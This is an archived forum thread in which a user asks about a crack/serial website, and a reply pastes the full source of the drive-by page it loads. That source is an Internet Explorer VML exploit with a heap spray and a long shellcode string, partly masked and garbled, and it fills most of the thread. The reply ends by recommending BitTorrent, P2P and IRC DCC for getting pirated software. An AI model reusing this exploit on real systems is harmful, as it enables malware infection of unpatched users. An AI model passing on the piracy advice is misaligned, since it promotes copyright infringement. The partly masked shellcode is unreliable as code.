check this out [Archive] - All Net Tools

Ezekiel

10-31-2006, 12:10 PM

ive come across this website that almost totally locks up my computer could someone explain that

http://www.seriall.com

beware it trys to give you a trojan.

That website is run by a script kiddy who uses code he didn't even create. He loads up this page in an iframe:

http://installare.net/e/t/ads_nl*.php?b=*020

And that page uses the VML exploit to install some crap onto the dumb user's computer. This is the source of that page:

<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="VMLRender" classid="CLSID:*0072CEC-8CC*-**D*-*86E-00A0C*55B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<script>
shellcode = unescape("&#*7008;&#*7008;᛫&#25*5*;&#****7;&#*2848;&#*776;&#*572*;찰쳌쳌쳌쳌쳌&#578*7;&#**52*;&#2***2;&#2**87;&#*285*;&#626**;&#****7;&#6**6*;&#6****;&#648**;&#655*5;&#4**;&#*276*;&#***5;&#2**5*;&#*260*;&#*552*;&#*870*;&#5*58*;᝴&#*26*5;&#*2754;&#26*04;&#****;ﲀ&#*0207;&#*22*0;&#*5044;&#*620;&#*8**6;&#57*27;&#*6**2;&#**075;닮&#655*5;&#*5*27;&#*27**;&#26***;&#*4745;&#*2546;닒곜&#5*2*6;&#4*586;&#6**70;&#2*64*;&#2*6**;&#4*276;&#*572*;&#46*5*;&#*82**;&#***24;&#*4*8*;&#*5266;&#**666;눼꿈&#***78;&#*75**;&#*87*4;&#*88*5;&#***22;&#**558;槌&#*0582;&#*6244;&#*028*;条&#*26**;&#24*4*;湢&#2*7*4;&#*2060;&#24*45;&#2*24*;瀷&#**68*;&#*0060;&#54*26;&#60*08;&#6*422;&#5*880;&#60**4;&#5**66; &#58**8;﷼&#655*4;&#6***2;&#650**;&#*0640;&#45**2;&#20**8;&#*06**;&#*6704;&#2*250;얄&#*66*8;&#*4**8;&#*7726;&#65*8;&#*7**2;엘&#4*748;&#2*844;&#5*74;늺�&#52**4;&#244*4;&#24*28;&#2*207;&#**0*2;&#575**;&#*870*;&#**65*;&#60**6;&#68**;&#*072;﬜&#**0*2;&#*4452;&#62*25;&#*408*;&#5*0;&#*2*08;&#470*5;&#5607*;&#544*4;&#564**;ɲ&#***77;&#5**58;&#*5750;&#58*0*;&#*700*;&#242**;&#57*0*;ᛩﻊ&#52*4*;&#6***8;&#2*7*5;&#2**5*;&#2*507;&#*27*6;&#85*2;&#2**54;≹&#5***0;&#***6*;&#5**65;&#2567*;뉐뮺&#5**88;&#560**;&#62**0;&#60**2;&#4*424;&#5***4;&#*****;&#*6*46;&#*575*;먱뤬&#65*4;&#*75**;&#65*2*;&#***46;��럞&#58**8;&#****7;&#44*2*;&#26**8;&#22*78;&#6*42*;&#*7*60;&#*647*;&#**768; &#200*6;&#640*6;ﯺ&#227**;&#*475*;&#***8;&#48*27;ࠉ&#257*;&#*527*;࣢&#**40;龞&#***52;&#*7845;ᛸ&#5**0;&#*5208;&#*5722;&#404**;ᳮ℠뎲&#465*6;&#42*76;&#*0*72;&#**050;Ꙅ&#500*5;&#4*44*;&#*2487;&#**620;&#4708*;&#*504*;&#*5*62;&#*587*;&#*6**0;&#4*6**;&#*6554;&#*77*2;&#*884*;&#4**5*;&#*265*;&#57*6;&#5*4*;&#5*5*5;&#42**7;&#54*22;&#***25;Ꙙ&#5*8*7;&#*52*5;&#****5;&#24*08;&#***06;&#60*72;&#26*20;&#*85*2;&#**725;浧潮&#5*7;&#27*;&#*8247;&#4*52;&#5**6;&#****4;&#626**;&#*0680;注&#*7***;&#**486;&#264*;&#57*5*;&#*5722;&#5*276;ﮐ쎒&#*8027;&#222**;뷬&#624*2;&#455*8;&#4*60;&#*0*0*;&#*26*;ꗍ&#42**8;囸&#6488*;계ꖹ&#20*85;&#*5*7*;&#56*7*;&#470*0;&#5*8*2;&#266**;&#**8**; &#6*4*4;&#***44;&#8*72;&#*50*2;&#62***;&#***76;&#6**7;&#*8*27;&#65*76;묂&#*5826;庰&#5*0*4;&#64**;힢&#4027*;&#2*7*4;&#64**2;&#2670*;&#608*2;&#60*7*;&#4**6*;&#560*0;&#2*58*;摖&#6**64;&#845*;&#754*;&#4*688;&#4**2*;&#447*2;&#4*6*0;&#47*8*;&#54*2;&#2240*;&#64*2;&#*72*5;ᔬ&#2445*;ᤨ掅&#***2;&#22*6*;鸨ቂᡠ&#*7*04;&#**66;&#*78**;⃿&#4**5*;氖&#50*7;&#*040*;᫄&#5*7*5;&#6*2*5;জ&#*8*86;&#625*5;&#*50*7;&#6508*;&#5*665;&#*6647;&#*00*0;&#4*0**;&#660*;&#*7504;&#862*;&#*785*;&#4**5*;儖&#4206*;&#*****;&#2*20*;&#488**;&#26**6;&#*667;&#*540;&#*286;&#***0*;&#4*576;&#**22;&#*65;Ƙ&#6*4;");
bigblock = unescape("&#*7008;&#*7008;");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<450;i++) memory[i] = block + shellcode;
</script><body>
<v:rect style='width:*20pt;height:80pt' fillcolor="red">
<v:fill method="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC&#**2*;&#**4*;&#*7476;&#*7476;&#**4*;&#**4*;" angle="-45"
focus="*00%" focusposition=".5,.5" focussize="0,0"
type="gradientRadial" />
</v:rect>
</body>
</html></v:rect>
</body>
</html>

The only people vulnerable to that exploit are IE users who have some sort of objection to updating their computer, who reject superior browsers such as FF and Opera, and browse lame crack websites, so it's their fault.

People that use serial or crack websites are seriously stupid. It is the sign of an incompetent computer user when they think searching google for "pirated software" and "cracks for *" will give them free software. All you will find are warez portals that load your computer with malware.

Bittorrent, p2p networks, and IRC DCC file transfers are the ways to illegally obtain software or movies.